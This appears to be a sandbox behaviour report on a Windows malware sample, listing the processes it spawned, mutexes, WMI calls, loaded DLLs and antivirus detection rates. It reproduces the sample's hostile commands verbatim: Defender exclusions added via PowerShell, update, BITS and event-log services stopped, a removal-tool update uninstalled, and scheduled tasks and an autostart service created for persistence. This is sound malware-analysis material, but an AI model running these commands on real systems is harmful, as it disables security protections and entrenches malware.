                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exeJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile created: C:\Users\user\Desktop\msAjSsFc.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeMutant created: \Sessions\1\BaseNamedObjects\Local\5ca49a59652f7149b9095204d2006cefde527ed294d5ef6eecd72eab40b4b978
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCommand line argument: sfxname1_2_00D6DF1E
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCommand line argument: sfxstime1_2_00D6DF1E
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCommand line argument: STARTDLG1_2_00D6DF1E
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\PerfDll\hyperProviderSavesinto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeReversingLabs: Detection: 60%
                                Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeVirustotal: Detection: 69%
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeFile read: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
                                Source: unknownProcess created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeSection loaded: profapi.dllJump to behavior
